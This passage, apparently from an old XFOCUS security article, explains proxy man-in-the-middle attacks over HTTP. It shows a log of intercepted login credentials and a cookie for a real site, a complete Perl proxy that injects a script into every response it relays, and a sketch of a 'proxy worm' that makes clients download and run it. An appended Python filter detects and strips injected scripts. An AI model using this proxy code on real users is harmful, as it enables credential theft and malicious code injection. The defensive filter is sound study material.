man-in-the-middle-attacks in proxy.html
            }
        }
    }
    $browser->close;
    $host->close;
}

=============================codz end===============================
Run this script and append its output to test.log:
C:\usr\bin>perl proxytest1.pl >>test.log

The client then logs in through this proxy at http://reg.163.com/CheckUser.jsp

Open test.log and you get the following data:

--------------Client submitted data-------------------
Opened reg.163.com , port 80
POST /CheckUser.jsp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer: http://reg.163.com/CheckUser.jsp
....... (omitted) .......
Cookie: URSJESSIONID=b370cQyLDya7
....... (omitted) .......
url=&username=hack-520&password=*****&submit=%B5%C7%A1%A1%C2%BC

................Server returned data.................xx
HTTP/1.1 200 OK


As shown in the figure:

Successfully obtained
username=hack-520
password=*****

2. Code injection
Throughout the proxied session it is ultimately the proxy server that delivers data to the client, and that data is under our control: we can inject our own malicious code into what is sent to the client. Modify the Perl program above as follows:

=============================codz start===============================
#!/usr/bin/perl
# proxy mid-man-atk test script

use strict;
use URI;
use IO::Socket;

my $showOpenedSockets = 1;

my $server = IO::Socket::INET->new(
    LocalPort => 8080,
    Type      => SOCK_STREAM,
    Reuse     => 1,
    Listen    => 10);

binmode $server;

while (my $browser = $server->accept()) {
    print "\n\n--------------------------------------------\n";

    binmode $browser;

    my $method = "";
    my $content_length = 0;
    my $content = 0;
    my $accu_content_length = 0;
    my $host;
    my $hostAddr;
    my $httpVer;

    # Read the client's request line by line and relay it to the web server
    while (my $browser_line = <$browser>) {
        unless ($method) {
            ($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+) +(\S+) +(\S+)/;

            my $uri = URI->new($hostAddr);

            $host = IO::Socket::INET->new(
                PeerAddr => $uri->host,
                PeerPort => $uri->port);

            die "couldn't open $hostAddr" unless $host;

            if ($showOpenedSockets) {
                print "Opened " . $uri->host . " , port " . $uri->port . "\n";
            }

            binmode $host;

            print $host "$method " . $uri->path_query . " $httpVer\n";
            print "$method " . $uri->path_query . " $httpVer\n";
            next;
        }

        $content_length = $1 if $browser_line =~ /Content-length: +(\d+)/i;
        print $browser_line;
        print $host $browser_line;
        last if $browser_line =~ /^\s*$/ and $method ne 'POST';
        if ($browser_line =~ /^\s*$/ and $method eq "POST") {
            $content = 1;
            last unless $content_length;
            next;
        }
        if ($content) {
            # Only body bytes count toward Content-Length
            $accu_content_length += length $browser_line;
            last if $accu_content_length >= $content_length;
        }
    }
    print "\n\nxx....................................xx\n";

    $content_length = 0;
    $content = 0;
    $accu_content_length = 0;

    # Read the whole server response, then append the injected script to it
    my @ret = <$host>;
    my $ret = @ret;
    push(@ret, "<script>alert(\"superhei\")</script>"); # <= note this line

    foreach my $host_line (@ret) {
        print $host_line;
        print $browser $host_line;
        $content_length = $1 if $host_line =~ /Content-length: +(\d+)/i;
        if ($host_line =~ m/^\s*$/ and not $content) {
            $content = 1;
            #last unless $content_length;
            next;
        }
        if ($content) {
            if ($content_length) {
                $accu_content_length += length $host_line;
                print "\nContent Length: $content_length, accu: $accu_content_length\n";
                last if $accu_content_length >= $content_length;
            }
        }
    }
    $browser->close;
    $host->close;
}
=============================codz end===============================
Code:

my @ret = <$host>;
my $ret = @ret;
push(@ret, "<script>alert(\"superhei\")</script>"); # <= note this line

Here the proxy injects <script>alert("superhei")</script> into the data returned by the web server, which it reads from <$host>.

Run the program above: whenever the client visits any site through this proxy, <script>alert("superhei")</script> is executed,
as shown in figure 2:

3. Implementing a proxy worm

If the example above is combined with other client-side attacks (such as a web trojan), a proxy worm can be built:


proxyworm --> client(proxyworm1) --> client1(proxyworm2) --> ... -->

After client1 uses the proxyworm proxy, proxyworm injects into the client code that makes the client download and run the worm itself; once attacked, the client becomes proxyworm1, and so on.

4. Other applications
Every technique has two sides, and this one can be used for defence as well: for example, a malicious-code filtering platform, where the data returned by the web server passes through the proxy, is filtered, and only then is sent on to the client
.........
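A defender-side counterpart to the injection in section 2 and the filtering proxy sketched in section 4, added here as an example and not part of the original article. Because the script pushes its `<script>` line after the complete response, the appended bytes land past the declared Content-Length when the server sent one; since the forwarding loop above stops once that length is reached, the line mostly reaches the client on responses without Content-Length, so a filter must also inspect the body itself. Both sample responses are constructed, and stripping every script block stands in for whatever policy a real filtering platform would apply.

```python
import re

# Constructed samples. The first is laid out as the proxy above forwards a
# response that declares Content-Length: real body, then the pushed <script>
# line after it. The second has no Content-Length (connection-close style), so
# the appended line simply becomes the tail of the body.
WITH_LENGTH = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 28\r\n\r\n"
               b"<html><body>ok</body></html>" b'<script>alert("superhei")</script>')
NO_LENGTH = (b"HTTP/1.0 200 OK\nContent-Type: text/html\n\n"
             b"<html><body>ok</body></html>" b'<script>alert("superhei")</script>')

SCRIPT_RE = re.compile(rb"<script\b.*?</script>", re.I | re.S)

def split_response(raw):
    """Return (head, separator, body); accepts CRLF or the bare LF the script writes."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition(b"\n\n")
    return head, sep, body

def declared_length(head):
    """Content-Length from the head, or None when the server sent none."""
    m = re.search(rb"^content-length:[ \t]*(\d+)", head, re.I | re.M)
    return int(m.group(1)) if m else None

def inspect_response(raw):
    """Report bytes past Content-Length and every script block in the body."""
    head, _, body = split_response(raw)
    n = declared_length(head)
    overflow = body[n:] if n is not None else b""
    return {"declared": n, "actual": len(body), "overflow": overflow,
            "scripts": [s.decode("utf-8", "replace") for s in SCRIPT_RE.findall(body)]}

def filter_response(raw):
    """Section 4 filter: drop overflow, strip script blocks, keep Content-Length truthful."""
    head, sep, body = split_response(raw)
    n = declared_length(head)
    if n is not None:
        body = body[:n]
    body = SCRIPT_RE.sub(b"", body)
    if n is not None:
        head = re.sub(rb"(?im)^(content-length:[ \t]*)\d+",
                      lambda m: m.group(1) + str(len(body)).encode(), head)
    return head + sep + body

if __name__ == "__main__":
    print(inspect_response(WITH_LENGTH))
    print(filter_response(NO_LENGTH))
```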

Summary:
Man-in-the-middle attacks are in fact a large topic that comes up in many areas;
this article has only given a shallow introduction to "proxy man-in-the-middle attack techniques" through the HTTP protocol. Interested readers may look into "proxy man-in-the-middle attack techniques" for other protocols.
</td>
</tr>
</table><div class="footer"> Copyright © 1998-2005 XFOCUS Team. All Rights Reserved</div></body></html>